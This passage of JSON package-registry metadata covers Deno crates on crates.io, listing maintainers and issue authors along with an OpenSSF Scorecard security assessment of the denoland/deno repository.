es.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-08-04T16:47:03.114Z","updated_at":"2026-08-04T16:47:03.114Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-08-04T16:47:03.117Z","updated_at":"2026-08-04T16:47:03.117Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047925,"name":"deno-x86_64-apple-darwin","ecosystem":"cargo","description":"Binary dependencies for the 'deno' crate","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":32,"first_release_published_at":"2019-03-31T00:17:46.026Z","latest_release_published_at":"2019-11-15T04:24:10.436Z","latest_release_number":"0.24.0","last_synced_at":"2026-09-07T22:55:07.535Z","created_at":"2022-04-12T10:03:01.517Z","updated_at":"2026-09-07T22:55:07.536Z","registry_url":"https://crates.io/crates/deno-x86_64-apple-darwin/","install_command":"cargo install deno-x86_64-apple-darwin","documentation_url":"https://docs.rs/deno-x86_64-apple-darwin/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori